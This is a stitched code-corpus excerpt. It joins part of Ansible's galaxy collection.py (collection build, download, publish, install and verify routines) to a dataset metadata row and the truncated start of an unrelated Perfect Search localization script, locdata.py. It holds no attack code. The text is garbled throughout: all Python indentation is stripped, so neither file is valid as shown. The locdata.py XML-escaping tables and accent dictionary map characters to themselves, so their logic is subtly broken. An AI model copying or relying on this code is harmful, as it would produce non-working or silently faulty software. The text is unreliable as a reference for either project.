return CollectionRequirement(namespace, name, b_path, None, [version], version, force, parent=parent,
metadata=meta, files=files, skip=True, allow_pre_releases=allow_pre_release)
@staticmethod
def from_name(collection, apis, requirement, force, parent=None, allow_pre_release=False):
namespace, name = collection.split('.', 1)
galaxy_meta = None
for api in apis:
try:
if not (requirement == '*' or requirement.startswith('<') or requirement.startswith('>') or
requirement.startswith('!=')):
# Exact requirement
allow_pre_release = True
if requirement.startswith('='):
requirement = requirement.lstrip('=')
resp = api.get_collection_version_metadata(namespace, name, requirement)
galaxy_meta = resp
versions = [resp.version]
else:
versions = api.get_collection_versions(namespace, name)
except GalaxyError as err:
if err.http_code == 404:
display.vvv("Collection '%s' is not available from server %s %s"
% (collection, api.name, api.api_server))
continue
raise
display.vvv("Collection '%s' obtained from server %s %s" % (collection, api.name, api.api_server))
break
else:
raise AnsibleError("Failed to find collection %s:%s" % (collection, requirement))
req = CollectionRequirement(namespace, name, None, api, versions, requirement, force, parent=parent,
metadata=galaxy_meta, allow_pre_releases=allow_pre_release)
return req
def build_collection(collection_path, output_path, force):
"""
Creates the Ansible collection artifact in a .tar.gz file.
:param collection_path: The path to the collection to build. This should be the directory that contains the
galaxy.yml file.
:param output_path: The path to create the collection build artifact. This should be a directory.
:param force: Whether to overwrite an existing collection build artifact or fail.
:return: The path to the collection build artifact.
"""
b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')
b_galaxy_path = os.path.join(b_collection_path, b'galaxy.yml')
if not os.path.exists(b_galaxy_path):
raise AnsibleError("The collection galaxy.yml path '%s' does not exist." % to_native(b_galaxy_path))
collection_meta = _get_galaxy_yml(b_galaxy_path)
file_manifest = _build_files_manifest(b_collection_path, collection_meta['namespace'], collection_meta['name'],
collection_meta['build_ignore'])
collection_manifest = _build_manifest(**collection_meta)
collection_output = os.path.join(output_path, "%s-%s-%s.tar.gz" % (collection_meta['namespace'],
collection_meta['name'],
collection_meta['version']))
b_collection_output = to_bytes(collection_output, errors='surrogate_or_strict')
if os.path.exists(b_collection_output):
if os.path.isdir(b_collection_output):
raise AnsibleError("The output collection artifact '%s' already exists, "
"but is a directory - aborting" % to_native(collection_output))
elif not force:
raise AnsibleError("The file '%s' already exists. You can use --force to re-create "
"the collection artifact." % to_native(collection_output))
_build_collection_tar(b_collection_path, b_collection_output, collection_manifest, file_manifest)
def download_collections(collections, output_path, apis, validate_certs, no_deps, allow_pre_release):
"""
Download Ansible collections as their tarball from a Galaxy server to the path specified and creates a requirements
file of the downloaded requirements to be used for an install.
:param collections: The collections to download, should be a list of tuples with (name, requirement, Galaxy Server).
:param output_path: The path to download the collections to.
:param apis: A list of GalaxyAPIs to query when search for a collection.
:param validate_certs: Whether to validate the certificate if downloading a tarball from a non-Galaxy host.
:param no_deps: Ignore any collection dependencies and only download the base requirements.
:param allow_pre_release: Do not ignore pre-release versions when selecting the latest.
"""
with _tempdir() as b_temp_path:
display.display("Process install dependency map")
with _display_progress():
dep_map = _build_dependency_map(collections, [], b_temp_path, apis, validate_certs, True, True, no_deps,
allow_pre_release=allow_pre_release)
requirements = []
display.display("Starting collection download process to '%s'" % output_path)
with _display_progress():
for name, requirement in dep_map.items():
collection_filename = "%s-%s-%s.tar.gz" % (requirement.namespace, requirement.name,
requirement.latest_version)
dest_path = os.path.join(output_path, collection_filename)
requirements.append({'name': collection_filename, 'version': requirement.latest_version})
display.display("Downloading collection '%s' to '%s'" % (name, dest_path))
b_temp_download_path = requirement.download(b_temp_path)
shutil.move(b_temp_download_path, to_bytes(dest_path, errors='surrogate_or_strict'))
requirements_path = os.path.join(output_path, 'requirements.yml')
display.display("Writing requirements.yml file of downloaded collections to '%s'" % requirements_path)
with open(to_bytes(requirements_path, errors='surrogate_or_strict'), mode='wb') as req_fd:
req_fd.write(to_bytes(yaml.safe_dump({'collections': requirements}), errors='surrogate_or_strict'))
def publish_collection(collection_path, api, wait, timeout):
"""
Publish an Ansible collection tarball into an Ansible Galaxy server.
:param collection_path: The path to the collection tarball to publish.
:param api: A GalaxyAPI to publish the collection to.
:param wait: Whether to wait until the import process is complete.
:param timeout: The time in seconds to wait for the import process to finish, 0 is indefinite.
"""
import_uri = api.publish_collection(collection_path)
if wait:
# Galaxy returns a url fragment which differs between v2 and v3. The second to last entry is
# always the task_id, though.
# v2: {"task": "https://galaxy-dev.ansible.com/api/v2/collection-imports/35573/"}
# v3: {"task": "/api/automation-hub/v3/imports/collections/838d1308-a8f4-402c-95cb-7823f3806cd8/"}
task_id = None
for path_segment in reversed(import_uri.split('/')):
if path_segment:
task_id = path_segment
break
if not task_id:
raise AnsibleError("Publishing the collection did not return valid task info. Cannot wait for task status. Returned task info: '%s'" % import_uri)
display.display("Collection has been published to the Galaxy server %s %s" % (api.name, api.api_server))
with _display_progress():
api.wait_import_task(task_id, timeout)
display.display("Collection has been successfully published and imported to the Galaxy server %s %s"
% (api.name, api.api_server))
else:
display.display("Collection has been pushed to the Galaxy server %s %s, not waiting until import has "
"completed due to --no-wait being set. Import task results can be found at %s"
% (api.name, api.api_server, import_uri))
def install_collections(collections, output_path, apis, validate_certs, ignore_errors, no_deps, force, force_deps,
allow_pre_release=False):
"""
Install Ansible collections to the path specified.
:param collections: The collections to install, should be a list of tuples with (name, requirement, Galaxy server).
:param output_path: The path to install the collections to.
:param apis: A list of GalaxyAPIs to query when searching for a collection.
:param validate_certs: Whether to validate the certificates if downloading a tarball.
:param ignore_errors: Whether to ignore any errors when installing the collection.
:param no_deps: Ignore any collection dependencies and only install the base requirements.
:param force: Re-install a collection if it has already been installed.
:param force_deps: Re-install a collection as well as its dependencies if they have already been installed.
"""
existing_collections = find_existing_collections(output_path, fallback_metadata=True)
with _tempdir() as b_temp_path:
display.display("Process install dependency map")
with _display_progress():
dependency_map = _build_dependency_map(collections, existing_collections, b_temp_path, apis,
validate_certs, force, force_deps, no_deps,
allow_pre_release=allow_pre_release)
display.display("Starting collection install process")
with _display_progress():
for collection in dependency_map.values():
try:
collection.install(output_path, b_temp_path)
except AnsibleError as err:
if ignore_errors:
display.warning("Failed to install collection %s but skipping due to --ignore-errors being set. "
"Error: %s" % (to_text(collection), to_text(err)))
else:
raise
def validate_collection_name(name):
"""
Validates the collection name as an input from the user or a requirements file fit the requirements.
:param name: The input name with optional range specifier split by ':'.
:return: The input value, required for argparse validation.
"""
collection, dummy, dummy = name.partition(':')
if AnsibleCollectionRef.is_valid_collection_name(collection):
return name
raise AnsibleError("Invalid collection name '%s', "
"name must be in the format <namespace>.<collection>. \n"
"Please make sure namespace and collection name contains "
"characters from [a-zA-Z0-9_] only." % name)
def validate_collection_path(collection_path):
""" Ensure a given path ends with 'ansible_collections'
:param collection_path: The path that should end in 'ansible_collections'
:return: collection_path ending in 'ansible_collections' if it does not already.
"""
if os.path.split(collection_path)[1] != 'ansible_collections':
return os.path.join(collection_path, 'ansible_collections')
return collection_path
def verify_collections(collections, search_paths, apis, validate_certs, ignore_errors, allow_pre_release=False):
with _display_progress():
with _tempdir() as b_temp_path:
for collection in collections:
try:
local_collection = None
b_collection = to_bytes(collection[0], errors='surrogate_or_strict')
if os.path.isfile(b_collection) or urlparse(collection[0]).scheme.lower() in ['http', 'https'] or len(collection[0].split('.')) != 2:
raise AnsibleError(message="'%s' is not a valid collection name. The format namespace.name is expected." % collection[0])
collection_name = collection[0]
namespace, name = collection_name.split('.')
collection_version = collection[1]
# Verify local collection exists before downloading it from a galaxy server
for search_path in search_paths:
b_search_path = to_bytes(os.path.join(search_path, namespace, name), errors='surrogate_or_strict')
if os.path.isdir(b_search_path):
if not os.path.isfile(os.path.join(to_text(b_search_path, errors='surrogate_or_strict'), 'MANIFEST.json')):
raise AnsibleError(
message="Collection %s does not appear to have a MANIFEST.json. " % collection_name +
"A MANIFEST.json is expected if the collection has been built and installed via ansible-galaxy."
)
local_collection = CollectionRequirement.from_path(b_search_path, False)
break
if local_collection is None:
raise AnsibleError(message='Collection %s is not installed in any of the collection paths.' % collection_name)
# Download collection on a galaxy server for comparison
try:
remote_collection = CollectionRequirement.from_name(collection_name, apis, collection_version, False, parent=None,
allow_pre_release=allow_pre_release)
except AnsibleError as e:
if e.message == 'Failed to find collection %s:%s' % (collection[0], collection[1]):
raise AnsibleError('Failed to find remote collection %s:%s on any of the galaxy servers' % (collection[0], collection[1]))
raise
download_url = remote_collection.metadata.download_url
headers = {}
remote_collection.api._add_auth_token(headers, download_url, required=False)
b_temp_tar_path = _download_file(download_url, b_temp_path, None, validate_certs, headers=headers)
local_collection.verify(remote_collection, search_path, b_temp_tar_path)
except AnsibleError as err:
if ignore_errors:
display.warning("Failed to verify collection %s but skipping due to --ignore-errors being set. "
"Error: %s" % (collection[0], to_text(err)))
else:
raise
@contextmanager
def _tempdir():
b_temp_path = tempfile.mkdtemp(dir=to_bytes(C.DEFAULT_LOCAL_TMP, errors='surrogate_or_strict'))
yield b_temp_path
shutil.rmtree(b_temp_path)
@contextmanager
def _tarfile_extract(tar, member):
tar_obj = tar.extractfile(member)
yield tar_obj
tar_obj.close()
@contextmanager
def _display_progress():
config_display = C.GALAXY_DISPLAY_PROGRESS
display_wheel = sys.stdout.isatty() if config_display is None else config_display
if not display_wheel:
yield
return
def progress(display_queue, actual_display):
actual_display.debug("Starting display_progress display thread")
t = threading.current_thread()
while True:
for c in "|/-\\":
actual_display.display(c + "\b", newline=False)
time.sleep(0.1)
# Display a message from the main thread
while True:
try:
method, args, kwargs = display_queue.get(block=False, timeout=0.1)
except queue.Empty:
break
else:
func = getattr(actual_display, method)
func(*args, **kwargs)
if getattr(t, "finish", False):
actual_display.debug("Received end signal for display_progress display thread")
return
class DisplayThread(object):
def __init__(self, display_queue):
self.display_queue = display_queue
def __getattr__(self, attr):
def call_display(*args, **kwargs):
self.display_queue.put((attr, args, kwargs))
return call_display
# Temporary override the global display class with our own which add the calls to a queue for the thread to call.
global display
old_display = display
try:
display_queue = queue.Queue()
display = DisplayThread(display_queue)
t = threading.Thread(target=progress, args=(display_queue, old_display))
t.daemon = True
t.start()
try:
yield
finally:
t.finish = True
t.join()
except Exception:
# The exception is re-raised so we can sure the thread is finished and not using the display anymore
raise
finally:
display = old_display
def _get_galaxy_yml(b_galaxy_yml_path):
meta_info = get_collections_galaxy_meta_info()
mandatory_keys = set()
string_keys = set()
list_keys = set()
dict_keys = set()
for info in meta_info:
if info.get('required', False):
mandatory_keys.add(info['key'])
key_list_type = {
'str': string_keys,
'list': list_keys,
'dict': dict_keys,
}[info.get('type', 'str')]
key_list_type.add(info['key'])
all_keys = frozenset(list(mandatory_keys) + list(string_keys) + list(list_keys) + list(dict_keys))
try:
with open(b_galaxy_yml_path, 'rb') as g_yaml:
galaxy_yml = yaml.safe_load(g_yaml)
except YAMLError as err:
raise AnsibleError("Failed to parse the galaxy.yml at '%s' with the following error:\n%s"
% (to_native(b_galaxy_yml_path), to_native(err)))
set_keys = set(galaxy_yml.keys())
missing_keys = mandatory_keys.difference(set_keys)
if missing_keys:
raise AnsibleError("The collection galaxy.yml at '%s' is missing the following mandatory keys: %s"
% (to_native(b_galaxy_yml_path), ", ".join(sorted(missing_keys))))
extra_keys = set_keys.difference(all_keys)
if len(extra_keys) > 0:
display.warning("Found unknown keys in collection galaxy.yml at '%s': %s"
% (to_text(b_galaxy_yml_path), ", ".join(extra_keys)))
# Add the defaults if they have not been set
for optional_string in string_keys:
if optional_string not in galaxy_yml:
galaxy_yml[optional_string] = None
for optional_list in list_keys:
list_val = galaxy_yml.get(optional_list, None)
if list_val is None:
galaxy_yml[optional_list] = []
elif not isinstance(list_val, list):
galaxy_yml[optional_list] = [list_val]
for optional_dict in dict_keys:
if optional_dict not in galaxy_yml:
galaxy_yml[optional_dict] = {}
# license is a builtin var in Python, to avoid confusion we just rename it to license_ids
galaxy_yml['license_ids'] = galaxy_yml['license']
del galaxy_yml['license']
return galaxy_yml
def _build_files_manifest(b_collection_path, namespace, name, ignore_patterns):
# We always ignore .pyc and .retry files as well as some well known version control directories. The ignore
# patterns can be extended by the build_ignore key in galaxy.yml
b_ignore_patterns = [
b'galaxy.yml',
b'.git',
b'*.pyc',
b'*.retry',
b'tests/output', # Ignore ansible-test result output directory.
to_bytes('{0}-{1}-*.tar.gz'.format(namespace, name)), # Ignores previously built artifacts in the root dir.
]
b_ignore_patterns += [to_bytes(p) for p in ignore_patterns]
b_ignore_dirs = frozenset([b'CVS', b'.bzr', b'.hg', b'.git', b'.svn', b'__pycache__', b'.tox'])
entry_template = {
'name': None,
'ftype': None,
'chksum_type': None,
'chksum_sha256': None,
'format': MANIFEST_FORMAT
}
manifest = {
'files': [
{
'name': '.',
'ftype': 'dir',
'chksum_type': None,
'chksum_sha256': None,
'format': MANIFEST_FORMAT,
},
],
'format': MANIFEST_FORMAT,
}
def _walk(b_path, b_top_level_dir):
for b_item in os.listdir(b_path):
b_abs_path = os.path.join(b_path, b_item)
b_rel_base_dir = b'' if b_path == b_top_level_dir else b_path[len(b_top_level_dir) + 1:]
b_rel_path = os.path.join(b_rel_base_dir, b_item)
rel_path = to_text(b_rel_path, errors='surrogate_or_strict')
if os.path.isdir(b_abs_path):
if any(b_item == b_path for b_path in b_ignore_dirs) or \
any(fnmatch.fnmatch(b_rel_path, b_pattern) for b_pattern in b_ignore_patterns):
display.vvv("Skipping '%s' for collection build" % to_text(b_abs_path))
continue
if os.path.islink(b_abs_path):
b_link_target = os.path.realpath(b_abs_path)
if not b_link_target.startswith(b_top_level_dir):
display.warning("Skipping '%s' as it is a symbolic link to a directory outside the collection"
% to_text(b_abs_path))
continue
manifest_entry = entry_template.copy()
manifest_entry['name'] = rel_path
manifest_entry['ftype'] = 'dir'
manifest['files'].append(manifest_entry)
_walk(b_abs_path, b_top_level_dir)
else:
if any(fnmatch.fnmatch(b_rel_path, b_pattern) for b_pattern in b_ignore_patterns):
display.vvv("Skipping '%s' for collection build" % to_text(b_abs_path))
continue
manifest_entry = entry_template.copy()
manifest_entry['name'] = rel_path
manifest_entry['ftype'] = 'file'
manifest_entry['chksum_type'] = 'sha256'
manifest_entry['chksum_sha256'] = secure_hash(b_abs_path, hash_func=sha256)
manifest['files'].append(manifest_entry)
_walk(b_collection_path, b_collection_path)
return manifest
def _build_manifest(namespace, name, version, authors, readme, tags, description, license_ids, license_file,
dependencies, repository, documentation, homepage, issues, **kwargs):
manifest = {
'collection_info': {
'namespace': namespace,
'name': name,
'version': version,
'authors': authors,
'readme': readme,
'tags': tags,
'description': description,
'license': license_ids,
'license_file': license_file if license_file else None, # Handle galaxy.yml having an empty string (None)
'dependencies': dependencies,
'repository': repository,
'documentation': documentation,
'homepage': homepage,
'issues': issues,
},
'file_manifest_file': {
'name': 'FILES.json',
'ftype': 'file',
'chksum_type': 'sha256',
'chksum_sha256': None, # Filled out in _build_collection_tar
'format': MANIFEST_FORMAT
},
'format': MANIFEST_FORMAT,
}
return manifest
def _build_collection_tar(b_collection_path, b_tar_path, collection_manifest, file_manifest):
files_manifest_json = to_bytes(json.dumps(file_manifest, indent=True), errors='surrogate_or_strict')
collection_manifest['file_manifest_file']['chksum_sha256'] = secure_hash_s(files_manifest_json, hash_func=sha256)
collection_manifest_json = to_bytes(json.dumps(collection_manifest, indent=True), errors='surrogate_or_strict')
with _tempdir() as b_temp_path:
b_tar_filepath = os.path.join(b_temp_path, os.path.basename(b_tar_path))
with tarfile.open(b_tar_filepath, mode='w:gz') as tar_file:
# Add the MANIFEST.json and FILES.json file to the archive
for name, b in [('MANIFEST.json', collection_manifest_json), ('FILES.json', files_manifest_json)]:
b_io = BytesIO(b)
tar_info = tarfile.TarInfo(name)
tar_info.size = len(b)
tar_info.mtime = time.time()
tar_info.mode = 0o0644
tar_file.addfile(tarinfo=tar_info, fileobj=b_io)
for file_info in file_manifest['files']:
if file_info['name'] == '.':
continue
# arcname expects a native string, cannot be bytes
filename = to_native(file_info['name'], errors='surrogate_or_strict')
b_src_path = os.path.join(b_collection_path, to_bytes(filename, errors='surrogate_or_strict'))
def reset_stat(tarinfo):
existing_is_exec = tarinfo.mode & stat.S_IXUSR
tarinfo.mode = 0o0755 if existing_is_exec or tarinfo.isdir() else 0o0644
tarinfo.uid = tarinfo.gid = 0
tarinfo.uname = tarinfo.gname = ''
return tarinfo
tar_file.add(os.path.realpath(b_src_path), arcname=filename, recursive=False, filter=reset_stat)
shutil.copy(b_tar_filepath, b_tar_path)
collection_name = "%s.%s" % (collection_manifest['collection_info']['namespace'],
collection_manifest['collection_info']['name'])
display.display('Created collection for %s at %s' % (collection_name, to_text(b_tar_path)))
def find_existing_collections(path, fallback_metadata=False):
collections = []
b_path = to_bytes(path, errors='surrogate_or_strict')
for b_namespace in os.listdir(b_path):
b_namespace_path = os.path.join(b_path, b_namespace)
if os.path.isfile(b_namespace_path):
continue
for b_collection in os.listdir(b_namespace_path):
b_collection_path = os.path.join(b_namespace_path, b_collection)
if os.path.isdir(b_collection_path):
req = CollectionRequirement.from_path(b_collection_path, False, fallback_metadata=fallback_metadata)
display.vvv("Found installed collection %s:%s at '%s'" % (to_text(req), req.latest_version,
to_text(b_collection_path)))
collections.append(req)
return collections
def _build_dependency_map(collections, existing_collections, b_temp_path, apis, validate_certs, force, force_deps,
no_deps, allow_pre_release=False):
dependency_map = {}
# First build the dependency map on the actual requirements
for name, version, source in collections:
_get_collection_info(dependency_map, existing_collections, name, version, source, b_temp_path, apis,
validate_certs, (force or force_deps), allow_pre_release=allow_pre_release)
checked_parents = set([to_text(c) for c in dependency_map.values() if c.skip])
while len(dependency_map) != len(checked_parents):
while not no_deps: # Only parse dependencies if no_deps was not set
parents_to_check = set(dependency_map.keys()).difference(checked_parents)
deps_exhausted = True
for parent in parents_to_check:
parent_info = dependency_map[parent]
if parent_info.dependencies:
deps_exhausted = False
for dep_name, dep_requirement in parent_info.dependencies.items():
_get_collection_info(dependency_map, existing_collections, dep_name, dep_requirement,
parent_info.api, b_temp_path, apis, validate_certs, force_deps,
parent=parent, allow_pre_release=allow_pre_release)
checked_parents.add(parent)
# No extra dependencies were resolved, exit loop
if deps_exhausted:
break
# Now we have resolved the deps to our best extent, now select the latest version for collections with
# multiple versions found and go from there
deps_not_checked = set(dependency_map.keys()).difference(checked_parents)
for collection in deps_not_checked:
dependency_map[collection].set_latest_version()
if no_deps or len(dependency_map[collection].dependencies) == 0:
checked_parents.add(collection)
return dependency_map
def _get_collection_info(dep_map, existing_collections, collection, requirement, source, b_temp_path, apis,
validate_certs, force, parent=None, allow_pre_release=False):
dep_msg = ""
if parent:
dep_msg = " - as dependency of %s" % parent
display.vvv("Processing requirement collection '%s'%s" % (to_text(collection), dep_msg))
b_tar_path = None
if os.path.isfile(to_bytes(collection, errors='surrogate_or_strict')):
display.vvvv("Collection requirement '%s' is a tar artifact" % to_text(collection))
b_tar_path = to_bytes(collection, errors='surrogate_or_strict')
elif urlparse(collection).scheme.lower() in ['http', 'https']:
display.vvvv("Collection requirement '%s' is a URL to a tar artifact" % collection)
try:
b_tar_path = _download_file(collection, b_temp_path, None, validate_certs)
except urllib_error.URLError as err:
raise AnsibleError("Failed to download collection tar from '%s': %s"
% (to_native(collection), to_native(err)))
if b_tar_path:
req = CollectionRequirement.from_tar(b_tar_path, force, parent=parent)
collection_name = to_text(req)
if collection_name in dep_map:
collection_info = dep_map[collection_name]
collection_info.add_requirement(None, req.latest_version)
else:
collection_info = req
else:
validate_collection_name(collection)
display.vvvv("Collection requirement '%s' is the name of a collection" % collection)
if collection in dep_map:
collection_info = dep_map[collection]
collection_info.add_requirement(parent, requirement)
else:
apis = [source] if source else apis
collection_info = CollectionRequirement.from_name(collection, apis, requirement, force, parent=parent,
allow_pre_release=allow_pre_release)
existing = [c for c in existing_collections if to_text(c) == to_text(collection_info)]
if existing and not collection_info.force:
# Test that the installed collection fits the requirement
existing[0].add_requirement(parent, requirement)
collection_info = existing[0]
dep_map[to_text(collection_info)] = collection_info
def _download_file(url, b_path, expected_hash, validate_certs, headers=None):
urlsplit = os.path.splitext(to_text(url.rsplit('/', 1)[1]))
b_file_name = to_bytes(urlsplit[0], errors='surrogate_or_strict')
b_file_ext = to_bytes(urlsplit[1], errors='surrogate_or_strict')
b_file_path = tempfile.NamedTemporaryFile(dir=b_path, prefix=b_file_name, suffix=b_file_ext, delete=False).name
display.vvv("Downloading %s to %s" % (url, to_text(b_path)))
# Galaxy redirs downloads to S3 which reject the request if an Authorization header is attached so don't redir that
resp = open_url(to_native(url, errors='surrogate_or_strict'), validate_certs=validate_certs, headers=headers,
unredirected_headers=['Authorization'], http_agent=user_agent())
with open(b_file_path, 'wb') as download_file:
actual_hash = _consume_file(resp, download_file)
if expected_hash:
display.vvvv("Validating downloaded file hash %s with expected hash %s" % (actual_hash, expected_hash))
if expected_hash != actual_hash:
raise AnsibleError("Mismatch artifact hash with downloaded file")
return b_file_path
def _extract_tar_file(tar, filename, b_dest, b_temp_path, expected_hash=None):
with _get_tar_file_member(tar, filename) as tar_obj:
with tempfile.NamedTemporaryFile(dir=b_temp_path, delete=False) as tmpfile_obj:
actual_hash = _consume_file(tar_obj, tmpfile_obj)
if expected_hash and actual_hash != expected_hash:
raise AnsibleError("Checksum mismatch for '%s' inside collection at '%s'"
% (to_native(filename, errors='surrogate_or_strict'), to_native(tar.name)))
b_dest_filepath = os.path.abspath(os.path.join(b_dest, to_bytes(filename, errors='surrogate_or_strict')))
b_parent_dir = os.path.dirname(b_dest_filepath)
if b_parent_dir != b_dest and not b_parent_dir.startswith(b_dest + to_bytes(os.path.sep)):
raise AnsibleError("Cannot extract tar entry '%s' as it will be placed outside the collection directory"
% to_native(filename, errors='surrogate_or_strict'))
if not os.path.exists(b_parent_dir):
# Seems like Galaxy does not validate if all file entries have a corresponding dir ftype entry. This check
# makes sure we create the parent directory even if it wasn't set in the metadata.
os.makedirs(b_parent_dir, mode=0o0755)
shutil.move(to_bytes(tmpfile_obj.name, errors='surrogate_or_strict'), b_dest_filepath)
# Default to rw-r--r-- and only add execute if the tar file has execute.
tar_member = tar.getmember(to_native(filename, errors='surrogate_or_strict'))
new_mode = 0o644
if stat.S_IMODE(tar_member.mode) & stat.S_IXUSR:
new_mode |= 0o0111
os.chmod(b_dest_filepath, new_mode)
def _get_tar_file_member(tar, filename):
n_filename = to_native(filename, errors='surrogate_or_strict')
try:
member = tar.getmember(n_filename)
except KeyError:
raise AnsibleError("Collection tar at '%s' does not contain the expected file '%s'." % (
to_native(tar.name),
n_filename))
return _tarfile_extract(tar, member)
def _get_json_from_tar_file(b_path, filename):
file_contents = ''
with tarfile.open(b_path, mode='r') as collection_tar:
with _get_tar_file_member(collection_tar, filename) as tar_obj:
bufsize = 65536
data = tar_obj.read(bufsize)
while data:
file_contents += to_text(data)
data = tar_obj.read(bufsize)
return json.loads(file_contents)
def _get_tar_file_hash(b_path, filename):
with tarfile.open(b_path, mode='r') as collection_tar:
with _get_tar_file_member(collection_tar, filename) as tar_obj:
return _consume_file(tar_obj)
def _consume_file(read_from, write_to=None):
bufsize = 65536
sha256_digest = sha256()
data = read_from.read(bufsize)
while data:
if write_to is not None:
write_to.write(data)
write_to.flush()
sha256_digest.update(data)
data = read_from.read(bufsize)
return sha256_digest.hexdigest()
| k0ste/ansible | lib/ansible/galaxy/collection.py | Python | gpl-3.0 | 55,098 | [
"Galaxy"
] | 89ab83329a3f79b5ed29f3f0a010a9da897561d73a6e4f973860cdb96d6d82e5 |
#
# $Id: locdata.py 9954 2011-06-23 22:03:57Z ahartvigsen $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, re, optparse, codecs, zipfile, glob, xml.dom.minidom
import subprocess
import _locpaths
import pslocale, ioutil, metadata, codescan
import sandbox
import vcs
from strdef import *
from textui.colors import *
from textui.ansi import *
STRINGSFILE_PAT = re.compile(r'(?:(.+)-?)?strings-((?:[a-z][a-z])(?:[-_](?:[a-z][a-z]))?)\.(.+)', re.IGNORECASE)
GETTEXT_PAT = re.compile(r'(?<![a-zA-Z0-9_])(_|gettext)\s*\(\s*(["\'])(.*?)(?<!\\)\2\s*[\),]')
FIND_SINGLE_PAT = re.compile(r'([\'])(?!Ps|http|www\.)([\%\=\t \w\.@{}\(\)\<\>#/"\[\]\-:;&+]*?)([\'])', re.IGNORECASE)
FIND_DOUBLE_PAT = re.compile(r'(["])(?!Ps|http|www\.)([\%\=\t \w\.@{}\(\)\<\>#/\'\[\]\-:;&+]*?)(["])', re.IGNORECASE)
ALT_PAT = re.compile(r'alt\=')
FORMAT_SPECIFIERS_PAT = re.compile(r'(["\'])([\s\w][=\s\w\.@{}\(\)<>#/\'";:-]*)(["\'])((\s\+)([\s\w][\s\w\.@{}\(\)\<\>#/]*)(\s\+)([\s\.\w]*)(["\'])([\s\w][\s\w\.@{}\(\)\<\>#/\'"]*)(["\']))+')
COMMENT_PAT = re.compile(r'[ \t]*//[= \w\.@{}\(\)<>#/\'";:-]*')
ESCAPED_QUOTE_PAT = re.compile(r'(?<!\\)\\([\'"])')
CANONICAL_STRINGSFILE_PAT = re.compile(r'(?:(.+)-)?strings-((?:[a-z][a-z])(?:_(?:[A-Z][A-Z]))?)\.(.+)')
TRANS_PAT = re.compile(r'^\s*(["\'])(.*?)(?<!\\)\1[\r\n\t ]*:[\r\n\t ]*(["\'])(.*?)(?<!\\)\3', re.MULTILINE)
JS_HEADER = u'''/*
* $Id: locdata.py 9954 2011-06-23 22:03:57Z ahartvigsen $
*
* Proprietary and confidential.
* Copyright $Date:: 2011#$ Perfect Search Corporation.
* All rights reserved.
*
*/
'''
TRANSFILE_HEADER = u'''<strings>
<!-- ____________________ INSTRUCTIONS FOR TRANSLATOR ________________________
A series of string pairs follow. Each pair contains an english value and an equivalent
in your language. If the equivalent is present, please review it for accuracy and correct
if necessary. If the equivalent has no useful value, please supply one.
In some cases, we have supplied a note providing additional context or explanation to
clarify how the string will be used. You can create your own notes as well, to ask us
questions; just add a <note lang="%s">...</note> to the appropriate string.
Strings may contain format specifiers (placeholders like "{0}") that will be replaced
with filenames, dates, and similar values at runtime. These placeholders are numbered
beginning with 0 (NOT 1). Please reorder them as needed to match the natural ordering
of your language. It is not necessarily an error to repeat a format specifier, so if
you see a string that uses {0} more than once, for example, preserve the duplication in
your translation.
You may also see an occasional <warning> tag. These are used to flag problems with our
English strings that we need to correct. We've included them so you can anticipate
tweaks we might make in the future.
-->
'''
def _stripJs(txt):
txt = txt.replace(u'\ufeff', u'')
txt = txt.strip()
if txt.startswith(u'/*'):
i = txt.find(u'*/')
assert(i > -1)
txt = txt[i + 2:]
lines = [x.strip() for x in txt.split(u'\n') if x.strip()]
txt = u'\n'.join(lines)
return txt
def jsIsDifferent(old, new):
old = _stripJs(old)
new = _stripJs(new)
return old != new
def undoEscapes(txt):
return ESCAPED_QUOTE_PAT.sub(r'\1', txt)
def prepForJson(txt):
return txt.replace('"', '\\"')
def prepForXml(txt):
prepChars = [u'&',u'<',u'>',u'"',u"'"]
reChars = [u'&',u'<',u'>',u'"',u''']
for i in range(len(prepChars)):
txt = txt.replace(prepChars[i], reChars[i])
return txt
def undoPrepForXml(txt):
prepChars = [u'<',u'>',u'"',u"'",u'&']
reChars = [u'<',u'>',u'"',u''',u'&']
for i in range(len(prepChars)):
txt = txt.replace(reChars[i], prepChars[i])
return txt
_ACCENTS = {
u'á':unichr(225),
u'Á':unichr(193),
u'à':unichr(224),
u'À':unichr(192),
u'â':unichr(226),
u'Â':unichr(194),
u'å':unichr(229),
u'Å':unichr(197),
u'ã':unichr(227),
u'Ã':unichr(195),
u'ä':unichr(228),
u'Ä':unichr(196),
u'æ':unichr(230),
u'Æ':unichr(198),
u'ç':unichr(231),
u'Ç':unichr(199),
u'é':unichr(233),
u'É':unichr(201),
u'è':unichr(232),
u'È':unichr(200),
u'ê':unichr(234),
u'Ê':unichr(202),
u'ë':unichr(235),
u'Ë':unichr(203),
u'í':unichr(237),
u'Í':unichr(205),
u'ì':unichr(236),
u'Ì':unichr(204),
u'î':unichr(238),
u'Î':unichr(206),
u'ï':unichr(239),
u'Ï':unichr(207),
u'ñ':unichr(241),
u'Ñ':unichr(209),
u'ó':unichr(243),
u'Ó':unichr(211),
u'ò':unichr(242),
u'Ò':unichr(210),
u'ô':unichr(244),
u'Ô':unichr(212),
u'ø':unichr(248),
u'Ø':unichr(216),
u'õ':unichr(245),
u'Õ':unichr(213),
u'ö':unichr(246),
u'Ö':unichr(214),
u'ß':unichr(223),
u'ú':unichr(250),
u'Ú':unichr(218),
u'ù':unichr(249),
u'Ù':unichr(217),
u'û':unichr(251),
u'Û':unichr(219),
u'ü':unichr(252),
u'Ü':unichr(220),
u'ÿ':unichr(255)
}
def accentChars(txt):
for escape, char in _ACCENTS.items():
txt = txt.replace(escape, char)
return txt
def _get_xml_text(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
_STR_TYPE = type('')
_USTR_TYPE = type(u'')
_REGEX_TYPE = type(NOTE_PAT)
def _read(path):
f = codecs.open(path, 'r', 'utf-8')
txt = f.read()
f.close()
return txt
def cvtMatches(matches, txt, path, idGrp, valGrp, locale):
m2 = []
for m in matches:
offset = m.start()
linenum = codescan.getLineNumForOffset(txt, offset)
strdef = StrDef(undoEscapes(m.group(idGrp)), undoEscapes(m.group(valGrp)), locale)
strdef.addLoc(FileLocation(path, linenum))
m2.append(strdef)
return m2
def findMisses(txt):
excludeIfBefore = [
'(tag|style|path|field|action|displayField|load|root|property|id|mode|action|size|dataIndex|itemSelector|uiprovider|Template|class|scale|align|ddGroup|record|theme|layout|margins|methond|name|region|mapping|type|pack|cls|event)\s*:\s?',
